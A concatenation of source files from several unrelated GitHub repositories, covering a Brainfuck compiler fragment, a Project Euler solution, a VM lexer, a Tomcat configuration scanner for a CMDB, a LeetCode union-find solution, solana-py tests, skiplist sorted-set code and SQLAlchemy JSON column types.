eof = 10
try:
eof = int(args[1])
except IndexError:
pass
out += ">"*s
out += ">"
out += ",{}[{}>,{}]".format("-"*eof, "+"*eof, "-"*eof)
out += "<"
out += "[<]"
out += "<"*s
variables = {}
varcounter = 0
indents = 0
indent_width = 4
for x in range(TMP_VARS):
runfunc("var", ["tmp_{}".format(x+0)])
runfunc("var", ["if_cond{}".format(x+0)])
runfunc("var", ["tmp_litprint"])
out = "\n"
linenum = 1
for line in sys.stdin.readlines():
line = line.strip()
if line:
cmd, *args = line.split()
try:
if cmd == "end_while" or cmd == "end_if":
indents -= 1
out += " "*indent_width*indents
runfunc(cmd, args)
out += ": {}\n".format(line)
if cmd == "while" or cmd == "if":
indents += 1
except KeyError as e:
print("Unknown Variable name: {}".format(str(e)))
print("Line {}".format(linenum))
raise e
sys.exit(1)
except ValueError:
print("Not enough arguments")
print("Line {}".format(linenum))
sys.exit(1)
if varcounter >= MAX_MEM_SIZE:
print("Over Memory Usage")
print("Line {}".format(linenum))
sys.exit(1)
linenum += 1
out = simplify(out)
print(out)
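# Example source read from stdin, in the mini-language handled by runfunc above:
#   var x
#   inc x 65
#   putch x    # emits 'A'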
``` |
{
"source": "5225225/project_euler",
"score": 3
} |
#### File: 5225225/project_euler/30.py
```python
POW = 5
pows = {}
pows10s = {}
for i in range(10):
pows[i] = i**POW
for i in range(10):
pows10s[i] = 10**i
def check(n):
    # sum of the POW-th powers of the (up to six) digits of n
    return sum(
        ((n % pows10s[d] - (n % pows10s[d - 1])) // pows10s[d - 1]) ** POW
        for d in range(1, 7)
    ) == n
s = 0
x = 2
lim = (pows[9])*6
while lim > x:
if check(x):
s += x
x += 1
print(s)
``` |
{
"source": "5225225/pyvm-newer",
"score": 3
} |
#### File: 5225225/pyvm-newer/cmdio.py
```python
import sys
import json
def jsonencode(commands):
out = []
for item in commands:
out.append([item.line, item.opcode, item.arguments])
return(json.dumps(out))
def jsondecode(jsonstring):
out = []
for item in json.loads(jsonstring):
out.append(Command(item[0], item[1], item[2]))
return out
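# Round trip: jsondecode(jsonencode(cmds)) rebuilds equivalent Command objects;
# line, opcode and arguments survive intact, and size is recomputed in __init__.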
class Command:
def __init__(self, line, opcode, arguments):
self.line = line
self.opcode = opcode
self.arguments = arguments
self.size = -1
        if self.opcode == "SET":
self.size = 4 # FORMAT: SET *x y
elif self.opcode == "JUMP":
self.size = 3 # FORMAT: JUMP *x
elif self.opcode == "IFE":
self.size = 7 # FORMAT: IFE *x *y *z
elif self.opcode == "ADD":
self.size = 5 # FORMAT: ADD/SUB *x *y
elif self.opcode == "GCHR":
self.size = 3
elif self.opcode == "PCHR":
self.size = 3
else:
print(str(self.line) + ": Invalid opcode of " + str(self.opcode))
sys.exit(1)
```
#### File: 5225225/pyvm-newer/lexer.py
```python
import json
import sys
import cmdio
from cmdio import Command
def decomment(commands):
output = []
for item in commands:
cmtpos = item.find("#")
if cmtpos == -1:
output.append(item)
else:
output.append(item[:cmtpos])
return output
if len(sys.argv) == 2:
infile = decomment(open(
sys.argv[1]).read().strip().split("\n"))
else:
infile = decomment(
sys.stdin.read().strip().split("\n"))
commands = []
for index, item in enumerate(infile, start=1):
line = index
if not item == "":
opcode = item.split(" ")[0]
arguments = item.split(" ")[1:]
while "" in arguments:
arguments.remove("")
intargs = []
for item in arguments:
if item.startswith("$"): # Convert hex values to decimal
intargs.append(int(item[1:], 16))
elif item.startswith("%"):
intargs.append(int(item[1:], 2)) # Convert binary to decimal
elif item.startswith("0"):
try:
intargs.append(int(item[1:], 8)) # Convert oct to decimal
except ValueError:
if item == "0":
intargs.append(0)
else:
raise
# The above code was to handle the case where a 0
# was being treated like a base specifier.
else:
try:
intargs.append(int(item))
except ValueError:
intargs.append(item)
cmd = Command(line, opcode, intargs)
commands.append(cmd)
sys.stdout.write(cmdio.jsonencode(commands))
``` |
{
"source": "523144419/autoScan4CMDB",
"score": 2
} |
#### File: autoScan4CMDB/tomcat/get_tomcat_ci.py
```python
from infodate.softinfo import *
reload(sys)
sys.setdefaultencoding("utf-8")
import xml.etree.ElementTree as ET
"""
Title: get_tomcat_ci.py
Dependent on: softinfo module
Time: 2018/1/29
function: Get tomcat infomation,and return the value into CMDB
e.g.
:return :
[
{
"AppName": "tomcat",
"InstallDir": "/u01/app/tomcat",
"JdkVersion": "1.8.0_171",
"jdbc": "jdbc:mysql://localhost:3306/mysql?autoReconnect=true",
"jmx": false,
"jvm_MaxMetaspace": null,
"jvm_MaxPerm": null,
"jvm_Metaspace": null,
"jvm_Perm": null,
"jvm_Xms": null,
"jvm_Xmx": null,
"maxThreads": null,
"minThreads": null,
"mode": "BIO",
"port": "8081",
"startup_location": "/u01/app/tomcat/bin/startup.sh",
"user": "cachecloud",
"version": "Apache Tomcat/8.5.33",
"webapps_files": "jenkins.war"
}
]
:type:
AppName : str
InstallDir : str
JdkVersion : str
dbInfo : str
jmx : bool
jvm_MaxMetaspace : str or null
jvm_Metaspace : str or null
jvm_MaxPerm : str or null
jvm_Perm : str or null
jvm_Xms : str or null
jvm_Xmx : str or null
maxThreads : str or null
minThreads : str or null
mode : str
port : str or null
startup_location : str or null
version : str or null
webapps_files : str or null
"""
LogFormat = '%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s'
logging.basicConfig(level=logging.INFO, format=LogFormat)
class get_tomcat_info(fifter):
"""
_init = fifter(self.cmd) 获取运行时Tomcat进程的基础数据
"""
def get_user(self, pid):
"""get pid of the startup tomcat"""
user = _init.username(pid)
return user
def app_name(self, name):
"""set appname"""
self.name = name
return name
def get_jdk_version(self, pid):
"""get userd java version"""
jdk_version = _init.jdkVersion(pid)
return jdk_version
def get_tomcat_port(self, tomcatBaseHome):
"""
解析server.xml文件获取Tomcat监听的端口号,判断配在文件中第一个itertag.tag=’Connector‘
:param tomcatBaseHome:
:return:
"""
server_xml_location = tomcatBaseHome + "/conf/server.xml"
if not os.path.exists(server_xml_location):
logging.error("{0}文件不存在,请检查,脚本已退出".format(server_xml_location))
return None
else:
serverXml_tree = ET.parse(server_xml_location)
serverXml_root = serverXml_tree.getroot()
for child in serverXml_root:
for itertag in child:
if itertag.tag == 'Connector' and itertag.attrib['protocol'] != 'AJP/1.3':
tomcat_http_port = itertag.attrib['port']
return tomcat_http_port
def get_tomcat_mode(self, tomcatBaseHome):
"""
解析server.xml文件获取Tomcat运行的模式,最大、最小线程数
:param tomcatBaseHome:
:return:
"""
tomcat_running_mode = ''
tomcat_http_MaxThreads = ''
tomcat_http_MinThreads = ''
server_xml_location = tomcatBaseHome + "/conf/server.xml"
if not os.path.exists(server_xml_location):
logging.error("{0}文件不存在,请检查,脚本已退出".format(server_xml_location))
return None
else:
serverXml_tree = ET.parse(server_xml_location)
serverXml_root = serverXml_tree.getroot()
for child in serverXml_root:
for itertag in child:
if itertag.tag == 'Connector':
tomcat_http_mode = itertag.attrib['protocol']
if tomcat_http_mode == 'HTTP/1.1':
tomcat_running_mode = 'BIO'
elif tomcat_http_mode == 'org.apache.coyote.http11.Http11NioProtocol':
tomcat_running_mode = 'NIO'
elif tomcat_http_mode == 'org.apache.coyote.http11.Http11AprProtocol':
tomcat_running_mode = 'ARP'
else:
tomcat_running_mode = None
attrib_dict = itertag.attrib
if 'maxThreads' in attrib_dict.keys():
tomcat_http_MaxThreads = attrib_dict['maxThreads']
else:
tomcat_http_MaxThreads = None
if 'minSpareThreads' in attrib_dict.keys():
tomcat_http_MinThreads = attrib_dict['minSpareThreads']
else:
tomcat_http_MinThreads = None
return tomcat_running_mode, tomcat_http_MaxThreads, tomcat_http_MinThreads
def get_tomcat_webapps(self, tomcatBaseHome):
"""
根据tomcat basehome拼接出webapps的绝对路径,获取webapps下的工程名称,会区分全量包和增量包的名称。
:param tomcatBaseHome:
:return: 全量包和增量包的名称
:type: str
"""
tomcat_webapps_location = tomcatBaseHome + "/webapps"
isdir = []
isfile = []
webapps_file = []
if not os.path.exists(tomcat_webapps_location):
logging.error("{0}文件不存在,请检查".format(tomcat_webapps_location))
return None
else:
ls_webapps = os.listdir(tomcat_webapps_location)
prohibit_file = ['manager', 'host-manager', 'examples', 'docs', 'ROOT']
for prohibitFile in prohibit_file:
if prohibitFile in ls_webapps:
ls_webapps.remove(prohibitFile)
for file_name in ls_webapps:
if os.path.isdir(os.path.join(tomcat_webapps_location, file_name)):
isdir.append(file_name)
elif os.path.isfile(os.path.join(tomcat_webapps_location, file_name)):
isfile.append(file_name)
else:
logging.error("无法判断 {0} 是文件或者文件夹,请确认".format(file_name))
for file in isfile:
file_split = file.split(".war")[0]
for dict_name in isdir:
if file_split == dict_name:
webapps_file.append(file)
isdir.remove(dict_name)
webapps_file.extend(isdir)
return ','.join(webapps_file)
def get_tomcat_version(self, tomcatBaseHome, username):
"""
通过执行tomcat自带的version.sh脚本获取当前tomcat的版本信息,使用sudo到进程启动用户执行version.sh,确保环境环境变量一致
:param tomcatBaseHome: tomcat安装目录
:param username: 当前进程启动用户
:return: tomcat版本信息 or None
"""
tomcat_version_sh = tomcatBaseHome + "/bin/version.sh"
tomcat_version_cmd = "su - " + username + " -c " + "\"" + tomcat_version_sh + "\""
tomat_version_dict = {}
if not os.path.exists(tomcat_version_sh):
logging.error("{0} 文件不存在".format(tomcat_version_sh))
return None
else:
ex_tomcat_version_cmd = commands.getstatusoutput(tomcat_version_cmd)
checkCode(ex_tomcat_version_cmd[0], tomcat_version_cmd, ex_tomcat_version_cmd[1])
tomcat_version_result = ex_tomcat_version_cmd[1].split("\n")
for result_part in tomcat_version_result:
tomcat_version = result_part.split(":")
tomat_version_dict[tomcat_version[0]] = tomcat_version[1]
if 'Server version' in tomat_version_dict.keys():
return tomat_version_dict['Server version'].lstrip()
else:
return None
def get_tomcat_jndi(self, tomcatBaseHome):
"""
通过ET模块解析context.com中的jndi配置,截取url连接串
:param tomcatBaseHome: tomcat安装目录
:return:
"""
if tomcatBaseHome is not None:
context_xml = tomcatBaseHome + "/conf/context.xml"
if not os.path.exists(context_xml):
logging.error("{0} 文件不存在".format(context_xml))
return None
else:
context_tree = ET.parse(context_xml)
context_root = context_tree.getroot()
for child_of_context_root in context_root:
for jndi_url in child_of_context_root.attrib:
if jndi_url == 'url':
# addr = child_of_context_root.attrib['url'].split("/")
addr = child_of_context_root.attrib['url']
return addr
return None
class get_proc_info(object):
""" 通过proc中的信息获取jvm和jmx的相关信息 """
def __init__(self, pid):
"""
:param pid: The running TOMCAT`s pid
"""
self.pid = pid
@property
def get_jvm_info(self):
"""
根据当前进程的pid,获取strings /proc/PID/cmdline命令的所有返回
:return: strings /proc/PID/cmdline命令的所有返回
:type: str
"""
_cmd_line = "strings /proc/{0}/cmdline".format(self.pid)
_ex_cmd_line = commands.getstatusoutput(_cmd_line)
checkCode(_ex_cmd_line[0], _cmd_line, _ex_cmd_line[1])
proc_jvm = _ex_cmd_line[1]
return proc_jvm
def get_jvm_info2list(self, jvm_info):
"""
根据strings命令的返回内容,将其拼接为list
:param jvm_info: strings /proc/PID/cmdline命令的所有返回,type为str
:return: strings /proc/PID/cmdline命令的所有返回,type为list
:type: list
"""
linelist = jvm_info.split("\n")
return linelist
def get_jvm(self, infolist):
"""
从get_jvm_info2list函数返回的list内容中,返回jvm参数,区分jdk1.7以下和jdk1.8
:param infolist:
:return: jvm
:type: tuple
"""
jvm_Xms = None
jvm_Xmx = None
jvm_Perm = None
jvm_MaxPerm = None
jvm_Metaspace = None
jvm_MaxMetaspace = None
for part in infolist:
jstart_Xm_part = re.compile(r"-Xms(.*)").match(part)
if jstart_Xm_part is not None:
jvm_Xms = jstart_Xm_part.group()
jvm_Xms = jvm_Xms.replace('-Xms', '')
jstart_Xm_part = re.compile(r"-Xmx(.*)").match(part)
if jstart_Xm_part is not None:
jvm_Xmx = jstart_Xm_part.group()
jvm_Xmx = jvm_Xmx.replace('-Xmx', '')
Jstart_XXMeta_part = re.compile(r"-XX:MetaspaceSize(.*)").match(part)
if Jstart_XXMeta_part is not None:
jvm_Metaspace = Jstart_XXMeta_part.group()
jvm_Metaspace = jvm_Metaspace.replace('-XX:MetaspaceSize=', '')
Jstart_XXMaxMeta_part = re.compile(r"-XX:MaxMetaspaceSize(.*)").match(part)
if Jstart_XXMaxMeta_part is not None:
jvm_MaxMetaspace = Jstart_XXMaxMeta_part.group()
jvm_MaxMetaspace = jvm_MaxMetaspace.replace('-XX:MaxMetaspaceSize=', '')
jstart_XXPer_part = re.compile(r"-XX:PermSize(.*)").match(part)
if jstart_XXPer_part is not None:
jvm_Perm = jstart_XXPer_part.group()
jvm_Perm = jvm_Perm.replace('-XX:PermSize=', '')
Jstart_XXMaxPer_part = re.compile(r"-XX:MaxPermSize(.*)").match(part)
if Jstart_XXMaxPer_part is not None:
jvm_MaxPerm = Jstart_XXMaxPer_part.group()
jvm_MaxPerm = jvm_MaxPerm.replace('-XX:MaxPermSize=', '')
return jvm_Xms, jvm_Xmx, jvm_Perm, jvm_MaxPerm, jvm_Metaspace, jvm_MaxMetaspace
def get_jmx(self, infolist):
"""
从get_jvm_info2list函数返回的list内容中,匹配-D开头的jvm参数,匹配-Dcom.sun.management.jmxremote.port参数判断该节点是否配在了jmx监控
:param infolist:
:return: True or None
"""
jmx = []
for part in infolist:
dstart_part = re.compile(r"-D(.*)")
find_dstart = dstart_part.match(part)
if find_dstart is not None:
jmx_D = find_dstart.group()
jmx.append(jmx_D)
for jmx_part in jmx:
jmx_D_split = jmx_part.split("=")
if jmx_D_split[0] == '-Dcom.sun.management.jmxremote.port':
jmx_set = True
return jmx_set
def get_tomcat_install(self, jmxinfo):
"""
查找Dcatalina.home的绝对路径
:param jmxinfo: jmx and other jvm param
:return: Dcatalina.home的绝对路径
:type: str
"""
for part in jmxinfo:
re_tomcat_install = re.compile(r"-Dcatalina.home=(.*)")
tomcat_install = re_tomcat_install.match(part)
if tomcat_install is not None:
tomcat_install_local = tomcat_install.groups(1)[0]
return tomcat_install_local
def get_startup_location(self, tomcatBaseHome):
"""
根据-Dcatalina.home,查找tomcat的startup.sh脚本的绝对路径
:param jmxinfo: -Dcatalina.home的绝对路径
:return: tomcat的startup.sh脚本的绝对路径
:type: str or None
"""
startup_location = tomcatBaseHome + "/bin/startup.sh"
if not os.path.exists(startup_location):
logging.error("{0}文件不存在,请检查".format(startup_location))
return None
else:
return startup_location
def get_netstat_db(self, dbRuslt=True):
"""
当get_tomcat_jndi函数返回值为None时,执行该函数,通过netstat命令获取和数据库建链情况
:param dbRuslt: 是否执行该函数,默认为不执行
:return:
"""
if not dbRuslt:
db_port = ["3306", "1521"]
for port in db_port:
_comm = "netstat -anp|grep -v grep |grep " + port + "|grep " + self.pid
_ex_comm = commands.getstatusoutput(_comm)
if _ex_comm[0] == 0:
_net_info = [x.split()[4] for x in _ex_comm[1].split("\n")]
_net_db = list(set(_net_info))
return _net_db
else:
return None
else:
return
class set_param2json():
""" 将所需字段封装到一个字典中 """
def __init__(self, func, tomcat_pid):
"""
:param func: get_tomcat_info对象
:param tomcat_pid: 单个tomcat进程的pid
"""
self.func = func
self.tomcat_pid = tomcat_pid
@property
def param2json(self):
"""
获取相关信息放入list中
:return: tomcat、jvm、jmx以及db的相关信息
:rtype: list
"""
user = self.func.get_user(self.tomcat_pid)
appname = self.func.app_name("tomcat")
jdkversion = self.func.get_jdk_version(self.tomcat_pid)
json_dick['JdkVersion'] = jdkversion
json_dick['user'] = user
json_dick['AppName'] = appname
proc_info = get_proc_info(pid=self.tomcat_pid)
proc_jvm = proc_info.get_jvm_info
proc_jvm_list = proc_info.get_jvm_info2list(proc_jvm)
        # get_jvm already handles both the JDK 1.7 (PermGen) and JDK 1.8 (Metaspace) flags
        json_dick['jvm_Xms'], json_dick['jvm_Xmx'], json_dick['jvm_Perm'], \
            json_dick['jvm_MaxPerm'], json_dick['jvm_Metaspace'], json_dick['jvm_MaxMetaspace'] = proc_info.get_jvm(proc_jvm_list)
if proc_info.get_jmx(proc_jvm_list) is None:
json_dick['jmx'] = False
else:
json_dick['jmx'] = proc_info.get_jmx(proc_jvm_list)
json_dick['InstallDir'] = proc_info.get_tomcat_install(proc_jvm_list)
json_dick['startup_location'] = proc_info.get_startup_location(json_dick['InstallDir'])
json_dick['port'] = _init.get_tomcat_port(json_dick['InstallDir'])
db_info = _init.get_tomcat_jndi(json_dick['InstallDir'])
if db_info:
json_dick['jdbc'] = _init.get_tomcat_jndi(json_dick['InstallDir'])
else:
db_info_list = proc_info.get_netstat_db(dbRuslt=False)
if db_info_list:
json_dick['jdbc'] = ','.join(db_info_list)
else:
json_dick['jdbc'] = None
json_dick['mode'], json_dick['maxThreads'], json_dick['minThreads'] = _init.get_tomcat_mode(json_dick['InstallDir'])
json_dick['webapps_files'] = _init.get_tomcat_webapps(json_dick['InstallDir'])
json_dick['version'] = _init.get_tomcat_version(tomcatBaseHome=json_dick['InstallDir'],
username=json_dick['user'])
return json_dick
if __name__ == "__main__":
    # Initialize: search for running Tomcat processes by their command line
_init = get_tomcat_info("ps axu|grep java |grep -v grep|grep 'config.file'|grep '\-Dcatalina.home'", appType='Tomcat')
    # Collect the pids of the running processes into a list
pidlist = _init.pidList
ret_list = []
    # Iterate over the tomcat pids found on this machine
for idnu in pidlist:
json_dick = {}
_init_set_param2json = set_param2json(func=_init, tomcat_pid=idnu)
tomcat_base_param = _init_set_param2json.param2json
ret_list.append(tomcat_base_param)
node_dict = json.dumps(ret_list, sort_keys=True, indent=4, separators=(',', ': '), encoding='utf8',
ensure_ascii=True)
print node_dict
``` |
{
"source": "524119574/LeetCodeSolution",
"score": 4
} |
#### File: 524119574/LeetCodeSolution/_1168_OptimizeWaterDistributioninaVillage.py
```python
# Constraints:
# 1 <= n <= 10000
# wells.length == n
# 0 <= wells[i] <= 10^5
# 1 <= pipes.length <= 10000
# 1 <= pipes[i][0], pipes[i][1] <= n
# 0 <= pipes[i][2] <= 10^5
# pipes[i][0] != pipes[i][1]
"""
I didn't have any clue on how to do it when I saw the question for the first
time.
A key realization is to transform the question into a Minimum Spanning Tree
(MST) problem, by considering building a wall as equivalent of connection to
House 0 which has the water.
"""
class Solution(object):
def minCostToSupplyWater(self, n, wells, pipes):
"""
:type n: int
:type wells: List[int]
:type pipes: List[List[int]]
:rtype: int
"""
parents = [i for i in range(n + 1)] # We have added a new House 0.
def find(target):
"""
Note that this find implementation uses path compression, if this
technique wasn't employ the time complexity will gets very large,
i.e. linear.
The naive implementation looks like this:
if (target != parents[target]):
return find(parents[target])
return target
The path compression technique basically set the parent of the
target node to be the ultimate parent instead of the intermediate
parent, which reduces the time when we want to find its parent
again in the future.
A visualized example is the following, coming from Geeks for
Geeks: https://www.geeksforgeeks.org/union-find-algorithm-set-2-union-by-rank/
Let the subset {0, 1, .. 9} be represented as below and find() is
called for element 3.
9
/ | \
4 5 6
/ \ / \
0 3 7 8
/ \
1 2
When find() is called for 3, we traverse up and find 9 as
representative of this subset. With path compression, we also make
3 as the child of 9 so that when find() is called next time for 1,
2 or 3, the path to root is reduced.
9
/ / \ \
4 5 6 3
/ / \ / \
0 7 8 1 2
"""
if (target != parents[target]):
parents[target] = find(parents[target])
return parents[target]
def union(group1, group2):
group1Leader = find(group1)
group2Leader = find(group2)
parents[group1Leader] = group2Leader
newPipes = [(0, i + 1, wells[i]) for i in range(len(wells))]
totalPrice = cnt = 0
for end1, end2, price in sorted(newPipes + pipes, key=lambda p:p[2]):
if (find(end1) != find(end2)):
union(end1, end2)
totalPrice += price
cnt += 1
if (cnt == n):
return totalPrice
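# A small sanity check using the numbers from LeetCode's sample case
# (3 houses, well costs [1, 2, 2], pipes (1,2,1) and (2,3,1) -> total cost 3):
if __name__ == "__main__":
    print(Solution().minCostToSupplyWater(3, [1, 2, 2], [[1, 2, 1], [2, 3, 1]]))  # 3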
``` |
{
"source": "524119574/solana-py",
"score": 2
} |
#### File: solana-py/tests/conftest.py
```python
import pytest
from solana.account import Account
from solana.blockhash import Blockhash
from solana.publickey import PublicKey
@pytest.fixture(scope="session")
def stubbed_blockhash() -> Blockhash:
"""Arbitrary block hash."""
return Blockhash("EETubP5AKHgjPAhzPAFcb8BAY1hMH639CWCFTqi3hq1k")
@pytest.fixture(scope="session")
def stubbed_reciever() -> PublicKey:
"""Arbitrary known public key to be used as reciever."""
return PublicKey("<KEY>")
@pytest.fixture(scope="session")
def stubbed_sender() -> Account:
"""Arbitrary known account to be used as sender."""
return Account(bytes([8] * PublicKey.LENGTH))
```
#### File: tests/unit_tests/test_system_program.py
```python
import solana.system_program as sp
from solana.account import Account
def test_transfer():
"""Test creating a transaction for transfer."""
params = sp.TransferParams(from_pubkey=Account().public_key(), to_pubkey=Account().public_key(), lamports=123)
txn = sp.transfer(params)
assert len(txn.instructions) == 1
assert sp.decode_transfer(txn.instructions[0]) == params
``` |
{
"source": "524243642/badger",
"score": 2
} |
#### File: boost_collections/zskiplist/zset_node.py
```python
class ZsetNode(object):
def __init__(self, ele, score):
super(ZsetNode, self).__init__()
self.ele = ele
self.score = score
```
#### File: boost_collections/zskiplist/zset_obj.py
```python
from sys import maxsize
from boost_collections.zskiplist.constant import ZADD_NX, ZADD_INCR, ZADD_ADDED, ZADD_UPDATED, ZADD_NOP, ZADD_NONE, OK
from boost_collections.zskiplist.exception import NotSupportException
from boost_collections.zskiplist.zset import Zset
from boost_collections.zskiplist.zset_node import ZsetNode
class ZsetObj(object):
def __init__(self):
super(ZsetObj, self).__init__()
self.zset = Zset()
def zrange_generic_by_score(self, reverse, min_, minex, max_, maxex, limit, withscores):
"""
:param reverse:
:param min_:
:param minex:
:param max_:
:param maxex:
:param limit:
:param withscores:
:return:
"""
zsl = self.zset.zsl
rets = zsl.zsl_range_generic_by_score(reverse=reverse, min_=min_, minex=minex, max_=max_, maxex=maxex,
limit=limit)
result = []
for ret in rets:
result.append(ZsetNode(ele=ret[0], score=ret[1] if withscores else None))
return result
def zrange_generic(self, reverse, start, end, withscores):
"""
:param reverse:
:param start:
:param end:
:param withscores:
:return:
"""
assert (-maxsize - 1) <= start <= maxsize
llen = self.zset.zset_length()
if start < 0:
start = llen + start
if end < 0:
end = llen + end
if start < 0:
start = 0
if start > end or start >= llen:
return None
if end >= llen:
end = llen - 1
rangelen = (end - start) + 1
zsl = self.zset.zsl
rets = zsl.zsl_range_generic(reverse=reverse, start=start, rangelen=rangelen)
result = []
for ret in rets:
result.append(ZsetNode(ele=ret[0], score=ret[1] if withscores else None))
return result
# if reverse:
# ln = zsl.tail
# if start > 0:
# ln = zsl.zsl_get_element_by_rank(rank=llen - start)
# else:
# ln = zsl.header.level[0].forward
# if start > 0:
# ln = zsl.zsl_get_element_by_rank(rank=start + 1)
# result = []
# while rangelen > 0:
# assert ln is not None
# node = ZsetNode(ele=ln.ele, score=ln.score if withscores else None)
# result.append(node)
# ln = ln.backward if reverse else ln.level[0].forward
# rangelen -= 1
# return result
def zrange_by_score(self, min_, minex, max_, maxex, limit=-1, withscores=1):
"""
:param min_:
:param minex:
:param max_:
:param maxex:
:param limit:
:param withscores:
:return:
"""
return self.zrange_generic_by_score(reverse=0, min_=min_, minex=minex, max_=max_, maxex=maxex, limit=limit,
withscores=withscores)
def zrevrange_by_score(self, min_, minex, max_, maxex, limit=-1, withscores=1):
"""
:param min_:
:param minex:
:param max_:
:param maxex:
:param limit:
:param withscores:
:return:
"""
return self.zrange_generic_by_score(reverse=1, min_=min_, minex=minex, max_=max_, maxex=maxex, limit=limit,
withscores=withscores)
def zrange(self, start, end, withscores):
"""
:param start:
:param end:
:param withscores:
:return:
"""
return self.zrange_generic(reverse=0, start=start, end=end, withscores=withscores)
def zrevrange(self, start, end, withscores):
"""
:param start:
:param end:
:param withscores:
:return:
"""
return self.zrange_generic(reverse=1, start=start, end=end, withscores=withscores)
def strcasecmp(self, s1, s2):
if s1 is None and s2 is None:
return True
if s1 is None or s2 is None:
return False
if s1.lower() == s2.lower():
return True
return False
def zadd_generic(self, flags, elements, *opts):
"""
:param flags:
:param elements:
:param opts:
:return:
"""
added = 0
updated = 0
processed = 0
assert elements is not None and len(elements) > 0
for opt in opts:
if self.strcasecmp(opt, "nx"):
flags |= ZADD_NX
elif self.strcasecmp(opt, "incr"):
flags |= ZADD_INCR
else:
break
incr = (flags & ZADD_INCR) != 0
if incr and len(elements) > 1:
raise NotSupportException('INCR option supports a single increment-element pair')
for element in elements:
retval, retflags, retscore = self.zset.zset_add(score=element.score, ele=element.ele, flags=flags)
assert retval != 0
if retflags & ZADD_ADDED:
added += 1
if retflags & ZADD_UPDATED:
updated += 1
if not (retflags & ZADD_NOP):
processed += 1
score = retscore
element.score = score
return added + updated
def zadd(self, elements, *opt):
"""
:param elements:
:param opt:
:return:
"""
if not isinstance(elements, list):
elements = [elements]
        return self.zadd_generic(ZADD_NONE, elements, *opt)
def zincrby(self, elements, *opt):
"""
:param elements:
:param opt:
:return:
"""
if not isinstance(elements, list):
elements = [elements]
        return self.zadd_generic(ZADD_INCR, elements, *opt)
def zrem(self, *eles):
"""
:param eles:
:return:
"""
deleted = 0
for ele in eles:
retval = self.zset.zset_del(ele=ele)
if retval:
deleted += 1
return deleted
def zcard(self):
"""
:return:
"""
return self.zset.zset_length()
def zscore(self, ele):
"""
:param ele:
:return:
"""
retval, retscore = self.zset.zset_score(member=ele)
if retval == OK:
return retscore
return None
def zfloor(self, score):
"""
:param score:
:return:
"""
ret = self.zset.zset_get_floor_element_by_score(score=score)
if not ret:
return None
return ZsetNode(ele=ret[0], score=ret[1])
def zlower(self, score):
"""
:param score:
:return:
"""
ret = self.zset.zset_get_lower_element_by_score(score=score)
if not ret:
return None
return ZsetNode(ele=ret[0], score=ret[1])
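# A minimal usage sketch (assumes the boost_collections package is importable):
if __name__ == '__main__':
    zobj = ZsetObj()
    zobj.zadd([ZsetNode('a', 1.0), ZsetNode('b', 2.0)])
    print(zobj.zcard())      # 2
    print(zobj.zscore('a'))  # 1.0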
```
#### File: boost_collections/zskiplist/zskiplist_level.py
```python
class ZskiplistLevel(object):
def __init__(self):
super(ZskiplistLevel, self).__init__()
self.forward = None
self.span = None
```
#### File: tests/zskiplist/test_zskiplist_ex.py
```python
import unittest
from boost_collections.zskiplist.zskiplist_ex import ZskiplistEx
class TestZskiplist(unittest.TestCase):
def setUp(self):
self.zsl = ZskiplistEx()
self.zsl.zsl_insert(10, 'a')
self.zsl.zsl_insert(5, 'b')
def test_zsl_length(self):
zsl = self.zsl
length = zsl.zsl_length()
self.assertEqual(2, length)
def test_zsl_insert(self):
zsl = self.zsl
result = self.zsl.zsl_insert(11, 'c')
self.assertEqual(1, result)
self.assertEqual(3, zsl.zsl_length())
def test_zsl_delete(self):
zsl = self.zsl
result = zsl.zsl_delete(5, 'b')
self.assertEqual(1, zsl.zsl_length())
self.assertEqual(1, result)
def test_zsl_range_generic(self):
zsl = self.zsl
self.zsl.zsl_insert(-1, 'c')
result = zsl.zsl_range_generic(0, 0, 1)
self.assertEqual([('c', -1.0)], result)
if __name__ == '__main__':
unittest.main()
```
#### File: tests/zskiplist/test_zskiplist.py
```python
import unittest
from boost_collections.zskiplist.zskiplist import Zskiplist
class TestZskiplist(unittest.TestCase):
def setUp(self):
self.zsl = Zskiplist()
self.zsl.zsl_insert(10, 'a')
self.zsl.zsl_insert(10, 'b')
def test_zsl_insert(self):
zsl = self.zsl
self.zsl.zsl_insert(10, 'c')
self.assertEqual(3, zsl.length)
def test_zsl_delete(self):
zsl = self.zsl
zsl.zsl_delete(10, 'b')
self.assertEqual(1, zsl.length)
retval, node = zsl.zsl_delete(10, 'c')
self.assertEqual(0, retval)
def test_zsl_get_element_by_rank(self):
zsl = self.zsl
zsl.zsl_insert(3, 'c')
ele = zsl.zsl_get_element_by_rank(1)
self.assertIsNotNone(ele)
self.assertEqual('c', ele.ele)
ele = zsl.zsl_get_element_by_rank(4)
self.assertIsNone(ele)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "524243642/taobao_spider",
"score": 3
} |
#### File: taobao_spider/common/column.py
```python
import json
from sqlalchemy import TypeDecorator, Text
from sqlalchemy.dialects.mysql import LONGTEXT
from sqlalchemy.ext.mutable import Mutable
from config.config_loader import logger
class MutableDict(Mutable, dict):
@classmethod
def coerce(cls, key, value):
"""Convert plain dictionaries to MutableDict."""
if not isinstance(value, MutableDict):
if isinstance(value, dict):
return MutableDict(value)
# this call will raise ValueError
return Mutable.coerce(key, value)
else:
return value
def __setitem__(self, key, value):
"""Detect dictionary set events and emit change events."""
dict.__setitem__(self, key, value)
self.changed()
def __delitem__(self, key):
"""Detect dictionary del events and emit change events."""
dict.__delitem__(self, key)
self.changed()
@MutableDict.as_mutable
class JSONEncodedMutableDict(TypeDecorator):
"""Represents an mutable structure as a json-encoded string.
Usage::
JSONEncodedMutableDict(255)
"""
impl = Text
def process_bind_param(self, value, dialect):
if value:
value = json.dumps(value, ensure_ascii=False, indent=2)
else:
value = None
return value
def process_result_value(self, value, dialect):
if value:
value = json.loads(value)
else:
value = {}
return value
class JSONEncodedLongColumn(TypeDecorator):
impl = LONGTEXT
def process_bind_param(self, value, dialect):
try:
value = json.dumps(value, ensure_ascii=False, indent=2)
except BaseException as e:
logger.exception(e)
value = ''
return value
def process_result_value(self, value, dialect):
try:
value = json.loads(value)
except BaseException:
value = {}
return value
class JSONEncodedColumn(TypeDecorator):
impl = Text
def process_bind_param(self, value, dialect):
try:
value = json.dumps(value, ensure_ascii=False, indent=2)
except BaseException as e:
logger.exception(e)
value = ''
return value
def process_result_value(self, value, dialect):
try:
value = json.loads(value)
except BaseException:
value = {}
return value
def bit_column_helper(offset, name='status'):
"""a helper to turn a bit of an integer field to be a flag,
see DeleteBitMixin for an example
@param offset index of the bit, from lower to higher, starts from 0
@param name name of the column
"""
mask = 1 << offset
